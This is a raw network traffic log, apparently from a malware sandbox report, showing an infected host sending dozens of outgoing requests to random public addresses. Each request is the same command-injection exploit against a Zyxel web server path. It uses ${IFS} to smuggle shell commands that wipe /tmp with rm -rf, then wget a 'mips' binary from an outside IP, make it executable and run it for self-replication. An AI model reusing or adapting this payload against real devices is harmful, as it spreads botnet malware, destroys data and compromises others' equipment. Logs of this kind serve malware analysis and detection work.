                              Mar 31, 2024 08:41:08.541217089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1112192.168.2.1359954165.185.217.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541230917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1113192.168.2.1345414204.253.116.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541281939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1114192.168.2.1340714182.65.59.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541304111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1115192.168.2.1340782200.236.101.63443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541361094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1116192.168.2.134497425.163.185.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541362047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1117192.168.2.13534601.169.178.220443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541413069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1118192.168.2.1359906141.214.113.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541434050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1119192.168.2.1333992120.54.55.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541497946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1120192.168.2.1360630116.148.26.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541524887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1121192.168.2.135948648.0.194.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541573048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1122192.168.2.1347974122.129.96.82443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541609049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1123192.168.2.1338156150.22.99.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541661978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1124192.168.2.1334084177.238.80.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541680098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1125192.168.2.1342504113.192.132.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541734934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1126192.168.2.1349392107.208.185.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541758060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1127192.168.2.135892052.17.137.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541812897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1128192.168.2.1332816206.105.68.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541835070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1129192.168.2.1345836103.14.27.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541891098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1130192.168.2.133738813.174.188.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541913986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1131192.168.2.1349854177.179.178.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541954994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1132192.168.2.1356154126.62.119.41443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.541990995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1133192.168.2.135454059.146.189.166443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542035103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1134192.168.2.1339702175.171.247.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542062998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1135192.168.2.1356824183.187.218.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542118073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1136192.168.2.1360424120.186.240.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542150974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1137192.168.2.1340960101.232.14.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542207956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1138192.168.2.1358370152.81.226.80443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542226076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1139192.168.2.13359085.229.47.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542264938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1140192.168.2.1349362180.176.122.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542284966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1141192.168.2.134383220.88.124.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542316914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1142192.168.2.1354164145.216.254.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542356968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1143192.168.2.1359774139.91.54.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542378902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1144192.168.2.1355582222.6.9.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542439938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1145192.168.2.1337858197.190.32.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542489052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1146192.168.2.133587637.24.23.205443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542531967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1147192.168.2.133539834.184.125.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542573929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1148192.168.2.1354272132.52.18.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542599916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1149192.168.2.1347446129.33.63.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542659998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1150192.168.2.1351226161.19.25.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542700052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1151192.168.2.133287670.178.63.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542745113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1152192.168.2.135418052.119.117.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542778969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1153192.168.2.134202297.209.22.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542825937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1154192.168.2.1350794221.120.253.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542886019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1155192.168.2.13601622.173.37.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542922020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1156192.168.2.13601262.16.32.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.542970896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1157192.168.2.135552040.137.152.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543004036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1158192.168.2.133830057.185.184.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543041945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1159192.168.2.1359956124.30.36.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543075085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1160192.168.2.1347252126.223.255.71443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543124914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1161192.168.2.1341794149.228.228.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543140888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1162192.168.2.1339108149.134.202.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543185949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1163192.168.2.134692694.99.208.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543237925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1164192.168.2.13400064.101.226.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543282032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1165192.168.2.134472090.20.249.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543301105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1166192.168.2.1334170176.214.210.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543359041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1167192.168.2.133673476.68.143.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543387890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1168192.168.2.133768885.135.84.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543406963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1169192.168.2.135565462.126.147.154443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543464899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1170192.168.2.133675462.162.163.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543495893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1171192.168.2.1345710115.160.76.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543510914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1172192.168.2.134407632.223.119.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543550968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1173192.168.2.1337444103.168.5.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543598890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1174192.168.2.1349998164.245.9.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543632984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1175192.168.2.1340378154.181.155.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543674946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1176192.168.2.134917212.194.89.146443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543709993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1177192.168.2.1359006109.166.167.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543750048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1178192.168.2.1349378206.240.34.161443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543813944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1179192.168.2.1348048112.58.9.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.543873072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1180192.168.2.1358676192.124.193.33443
                              TimestampBytes transferredDirectionData
